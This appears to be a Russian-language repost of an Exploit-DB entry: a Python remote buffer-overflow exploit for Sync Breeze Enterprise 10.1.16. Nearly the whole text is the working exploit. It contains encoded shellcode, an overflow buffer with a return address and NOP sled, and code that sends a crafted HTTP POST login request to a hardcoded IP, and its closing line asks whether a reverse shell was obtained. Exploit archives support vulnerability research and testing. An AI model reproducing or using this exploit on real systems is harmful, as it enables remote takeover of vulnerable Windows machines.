- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 42886
- Проверка EDB
-
- Пройдено
- Автор
- MSCHENK
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2017-10-20
Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow
Код:
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
shellcode = ("\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"
"\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"
"\x64\x01\xc9\x0c\x08\x8e\xfe\xa5\xa7\xe8\x31\x35\x9b\xc9\x50"
"\xb5\xe6\x1d\xb2\x84\x28\x50\xb3\xc1\x55\x99\xe1\x9a\x12\x0c"
"\x15\xae\x6f\x8d\x9e\xfc\x7e\x95\x43\xb4\x81\xb4\xd2\xce\xdb"
"\x16\xd5\x03\x50\x1f\xcd\x40\x5d\xe9\x66\xb2\x29\xe8\xae\x8a"
"\xd2\x47\x8f\x22\x21\x99\xc8\x85\xda\xec\x20\xf6\x67\xf7\xf7"
"\x84\xb3\x72\xe3\x2f\x37\x24\xcf\xce\x94\xb3\x84\xdd\x51\xb7"
"\xc2\xc1\x64\x14\x79\xfd\xed\x9b\xad\x77\xb5\xbf\x69\xd3\x6d"
"\xa1\x28\xb9\xc0\xde\x2a\x62\xbc\x7a\x21\x8f\xa9\xf6\x68\xd8"
"\x1e\x3b\x92\x18\x09\x4c\xe1\x2a\x96\xe6\x6d\x07\x5f\x21\x6a"
"\x68\x4a\x95\xe4\x97\x75\xe6\x2d\x5c\x21\xb6\x45\x75\x4a\x5d"
"\x95\x7a\x9f\xf2\xc5\xd4\x70\xb3\xb5\x94\x20\x5b\xdf\x1a\x1e"
"\x7b\xe0\xf0\x37\x16\x1b\x93\xf7\x4f\x93\xde\x90\x8d\xd3\x21"
"\xda\x1b\x35\x4b\x0c\x4a\xee\xe4\xb5\xd7\x64\x94\x3a\xc2\x01"
"\x96\xb1\xe1\xf6\x59\x32\x8f\xe4\x0e\xb2\xda\x56\x98\xcd\xf0"
"\xfe\x46\x5f\x9f\xfe\x01\x7c\x08\xa9\x46\xb2\x41\x3f\x7b\xed"
"\xfb\x5d\x86\x6b\xc3\xe5\x5d\x48\xca\xe4\x10\xf4\xe8\xf6\xec"
"\xf5\xb4\xa2\xa0\xa3\x62\x1c\x07\x1a\xc5\xf6\xd1\xf1\x8f\x9e"
"\xa4\x39\x10\xd8\xa8\x17\xe6\x04\x18\xce\xbf\x3b\x95\x86\x37"
"\x44\xcb\x36\xb7\x9f\x4f\x56\x5a\x35\xba\xff\xc3\xdc\x07\x62"
"\xf4\x0b\x4b\x9b\x77\xb9\x34\x58\x67\xc8\x31\x24\x2f\x21\x48"
"\x35\xda\x45\xff\x36\xcf")
inputBuffer = "A" * 780 + "\x83\x0c\x09\x10" + "C" * 4 + "\x90" * 10 + shellcode
content="username="+inputBuffer+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.176.139\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.176.139/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(content))+"\r\n"
buffer+="\r\n"
buffer+=content
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.176.139", 80))
s.send(buffer)
s.close()
print "\nDone did you get a reverse shell?"
except:
print "\nCould not connect!"
- Источник
- www.exploit-db.com